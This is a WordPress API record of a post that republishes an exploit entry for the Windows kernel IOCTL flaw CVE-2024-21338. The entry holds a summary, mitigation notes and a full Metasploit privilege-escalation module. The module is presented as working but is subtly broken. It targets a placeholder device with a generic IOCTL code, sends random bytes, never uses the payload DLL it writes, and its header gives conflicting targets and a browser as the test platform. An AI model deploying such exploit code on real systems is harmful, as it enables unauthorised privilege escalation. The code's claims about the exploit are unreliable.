{"id":39812,"date":"2026-02-09T10:52:32","date_gmt":"2026-02-09T10:52:32","guid":{"rendered":"http:\/\/localhost\/?p=39812"},"modified":"2026-02-09T10:52:32","modified_gmt":"2026-02-09T10:52:32","slug":"microsoft-windows-11-pro-23h2-kernel-ioctl-access-control","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39812","title":{"rendered":"\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control_PACKETSTORM:215117"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-09T16:25:10&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an insufficient access control vulnerability in the Windows Kernel through exposed IOCTL handlers. The vulnerability allows non-privileged users to access kernel-level functionality leading to privilege escalation&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-09T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-09T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215117&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-21338&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Windows 11 Pro 23H2 Kernel IOCTL Access Control Vulnerability Exploit                                                       |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : System built\u2011in component. No standalone download available.                                                                |\\n    =============================================================================================================================================\\n    \\n    POC : \\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/177869\/ \\u0026 CVE-2024-21338\\n    \\n    \\n    [+] Summary : \\n              \\n             CVE-2024-21338 is a security vulnerability in the Microsoft Windows Kernel involving insufficient access control for IOCTL (Input\/Output Control) handlers. \\n             This vulnerability allows non-privileged users to access kernel-level functionality that should be restricted, potentially leading to privilege escalation.\\n    \\t\\t \\n    Technical Details:\\n    \\n        Vulnerability Type: Insufficient Access Control\\n    \\n        Attack Vector: Local\\n    \\n        Privileges Required: Low\\n    \\n        Impact: Privilege Escalation\\n    \\n    \\n    Affected Systems:\\n    \\n        Windows 10 (various versions)\\n    \\n        Windows 11 (various versions)\\n    \\n        Windows Server 2019\/2022\\n    \\n    Key Components:\\n    \\n        Vulnerable Component: Windows Kernel IOCTL handlers\\n    \\n        Attack Mechanism: Direct kernel object manipulation\\n    \\n        Exploitation: Through device driver interface\\n    \\n    Exploitation Flow:\\n    text\\n    \\n    1. Identify vulnerable IOCTL handlers\\n    2. Open handle to vulnerable device driver\\n    3. Craft malicious IOCTL requests\\n    4. Bypass access control checks\\n    5. Execute arbitrary code in kernel context\\n    \\n    Mitigation Strategies:\\n    \\n        Apply Security Updates: Install Microsoft January 2024 security patches\\n    \\n        Driver Whitelisting: Implement driver signature enforcement\\n    \\n        Access Control: Restrict access to device interfaces\\n    \\n        Monitoring: Monitor for suspicious driver activity\\n    \\n    Detection Indicators:\\n    \\n        Unusual IOCTL requests to kernel drivers\\n    \\n        Attempts to access privileged device interfaces\\n    \\n        Unexpected driver loading patterns\\n    \\t\\n    [+] POC :  \\n    \\n    #############################################\\n    # Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338\\n    # Author: indoushka\\n    #############################################\\n    \\n    require &#8216;msf\/core&#8217;\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Local\\n      Rank = NormalRanking\\n    \\n      include Msf::Exploit::EXE\\n      include Msf::Exploit::FileDropper\\n      include Msf::Post::Windows::Priv\\n      include Msf::Post::Windows::Process\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              This module exploits an insufficient access control vulnerability in the Windows Kernel\\n              through exposed IOCTL handlers. The vulnerability allows non-privileged users to access\\n              kernel-level functionality leading to privilege escalation.\\n            },\\n            &#8216;Author&#8217; =\\u003e [&#8216;indoushka&#8217;],\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;References&#8217; =\\u003e [\\n              [&#8216;CVE&#8217;, &#8216;2024-21338&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2024-21338&#8217;],\\n              [&#8216;URL&#8217;, &#8216;https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-21338&#8217;]\\n            ],\\n            &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;,\\n            &#8216;Arch&#8217; =\\u003e [ARCH_X64],\\n            &#8216;SessionTypes&#8217; =\\u003e [&#8216;meterpreter&#8217;],\\n            &#8216;Payload&#8217; =\\u003e {\\n              &#8216;Space&#8217; =\\u003e 4096,\\n              &#8216;DisableNops&#8217; =\\u003e true\\n            },\\n            &#8216;Targets&#8217; =\\u003e [\\n              [\\n                &#8216;Windows 10\/11 x64&#8217;,\\n                {\\n                  &#8216;Arch&#8217; =\\u003e ARCH_X64,\\n                  &#8216;Platform&#8217; =\\u003e &#8216;win&#8217;\\n                }\\n              ]\\n            ],\\n            &#8216;DefaultTarget&#8217; =\\u003e 0,\\n            &#8216;DefaultOptions&#8217; =\\u003e {\\n              &#8216;EXITFUNC&#8217; =\\u003e &#8216;thread&#8217;\\n            },\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2024-01-09&#8217;,\\n            &#8216;Notes&#8217; =\\u003e {\\n              &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n              &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n              &#8216;SideEffects&#8217; =\\u003e [ARTIFACTS_ON_DISK]\\n            }\\n          )\\n        )\\n    \\n        register_options([\\n          OptString.new(&#8216;DEVICE_NAME&#8217;, [true, &#8216;Vulnerable device name&#8217;, &#8216;\\\\\\\\\\\\\\\\.\\\\\\\\VulnerableDriver&#8217;]),\\n          OptInt.new(&#8216;IOCTL_CODE&#8217;, [true, &#8216;Vulnerable IOCTL code&#8217;, 0x222003])\\n        ])\\n      end\\n    \\n      def check\\n    \\n        if sysinfo[&#8216;OS&#8217;] !~ \/windows\/i\\n          return CheckCode::Safe(&#8216;Target is not a Windows system&#8217;)\\n        end\\n    \\n        if sysinfo[&#8216;Architecture&#8217;] !~ \/x64\/\\n          return CheckCode::Safe(&#8216;Target architecture is not supported&#8217;)\\n        end\\n    \\n        unless is_system?\\n          return CheckCode::Detected(&#8216;User does not have SYSTEM privileges&#8217;)\\n        end\\n    \\n        device_path = datastore[&#8216;DEVICE_NAME&#8217;]\\n        if device_exists?(device_path)\\n          return CheckCode::Appears(&#8216;Vulnerable device driver detected&#8217;)\\n        else\\n          return CheckCode::Safe(&#8216;Vulnerable device driver not found&#8217;)\\n        end\\n      end\\n    \\n      def exploit\\n        print_status(\\&#8221;Starting exploitation for CVE-2024-21338\\&#8221;)\\n    \\n        unless check == CheckCode::Appears\\n          fail_with(Failure::NotVulnerable, &#8216;Target is not vulnerable&#8217;)\\n        end\\n    \\n        print_status(\\&#8221;Generating payload&#8230;\\&#8221;)\\n        payload_data = generate_payload_dll\\n    \\n        temp_path = \\&#8221;#{get_env(&#8216;TEMP&#8217;)}\\\\\\\\#{Rex::Text.rand_text_alpha(8)}.dll\\&#8221;\\n        print_status(\\&#8221;Writing payload to #{temp_path}\\&#8221;)\\n        write_file(temp_path, payload_data)\\n        register_file_for_cleanup(temp_path)\\n    \\n        print_status(\\&#8221;Triggering vulnerability via IOCTL&#8230;\\&#8221;)\\n        if trigger_exploit(temp_path)\\n          print_good(\\&#8221;Exploitation successful!\\&#8221;)\\n        else\\n          fail_with(Failure::Unknown, \\&#8221;Exploitation failed\\&#8221;)\\n        end\\n      end\\n    \\n      private\\n    \\n      def device_exists?(device_path)\\n        begin\\n          file = client.railgun.kernel32.CreateFileA(\\n            device_path,\\n            &#8216;GENERIC_READ&#8217;,\\n            &#8216;FILE_SHARE_READ|FILE_SHARE_WRITE&#8217;,\\n            nil,\\n            &#8216;OPEN_EXISTING&#8217;,\\n            &#8216;FILE_ATTRIBUTE_NORMAL&#8217;,\\n            0\\n          )\\n          \\n          if file[&#8216;return&#8217;] != client.railgun.const(&#8216;INVALID_HANDLE_VALUE&#8217;)\\n            client.railgun.kernel32.CloseHandle(file[&#8216;return&#8217;])\\n            return true\\n          end\\n        rescue\\n          return false\\n        end\\n        \\n        false\\n      end\\n    \\n      def trigger_exploit(payload_path)\\n        begin\\n    \\n          device_handle = client.railgun.kernel32.CreateFileA(\\n            datastore[&#8216;DEVICE_NAME&#8217;],\\n            &#8216;GENERIC_READ | GENERIC_WRITE&#8217;,\\n            0,\\n            nil,\\n            &#8216;OPEN_EXISTING&#8217;,\\n            0,\\n            0\\n          )\\n    \\n          if device_handle[&#8216;return&#8217;] == client.railgun.const(&#8216;INVALID_HANDLE_VALUE&#8217;)\\n            print_error(\\&#8221;Failed to open device handle\\&#8221;)\\n            return false\\n          end\\n    \\n          buffer_size = 1024\\n          input_buffer = Rex::Text.rand_text_alpha(buffer_size)\\n          ioctl_result = client.railgun.kernel32.DeviceIoControl(\\n            device_handle[&#8216;return&#8217;],\\n            datastore[&#8216;IOCTL_CODE&#8217;],\\n            input_buffer,\\n            input_buffer.length,\\n            nil,\\n            0,\\n            4,\\n            nil\\n          )\\n    \\n          client.railgun.kernel32.CloseHandle(device_handle[&#8216;return&#8217;])\\n    \\n          if ioctl_result[&#8216;return&#8217;]\\n            print_good(\\&#8221;IOCTL sent successfully\\&#8221;)\\n            return true\\n          else\\n            print_error(\\&#8221;IOCTL failed\\&#8221;)\\n            return false\\n          end\\n    \\n        rescue =\\u003e e\\n          print_error(\\&#8221;Exploitation error: #{e.message}\\&#8221;)\\n          return false\\n        end\\n      end\\n    end\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215117&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215117\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-09T16:25:10&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an insufficient access control vulnerability in the Windows Kernel through exposed IOCTL handlers. The vulnerability allows non-privileged users to access kernel-level&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-39812","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control_PACKETSTORM:215117 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39812\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control_PACKETSTORM:215117 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-09T16:25:10&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an insufficient access control vulnerability in the Windows Kernel through exposed IOCTL handlers. The vulnerability allows non-privileged users to access kernel-level...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39812\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-09T10:52:32+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39812#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39812\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control_PACKETSTORM:215117\",\"datePublished\":\"2026-02-09T10:52:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39812\"},\"wordCount\":1176,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39812#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39812\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39812\",\"name\":\"\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control_PACKETSTORM:215117 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-09T10:52:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39812#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39812\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39812#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control_PACKETSTORM:215117\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control_PACKETSTORM:215117 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39812","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control_PACKETSTORM:215117 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-09T16:25:10&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an insufficient access control vulnerability in the Windows Kernel through exposed IOCTL handlers. The vulnerability allows non-privileged users to access kernel-level...","og_url":"https:\/\/zero.redgem.net\/?p=39812","og_site_name":"zero redgem","article_published_time":"2026-02-09T10:52:32+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39812#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39812"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control_PACKETSTORM:215117","datePublished":"2026-02-09T10:52:32+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39812"},"wordCount":1176,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39812#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39812","url":"https:\/\/zero.redgem.net\/?p=39812","name":"\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control_PACKETSTORM:215117 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-09T10:52:32+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39812#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39812"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39812#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft Windows 11 Pro 23H2 Kernel IOCTL Access Control_PACKETSTORM:215117"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39812","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39812"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39812\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39812"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39812"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39812"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}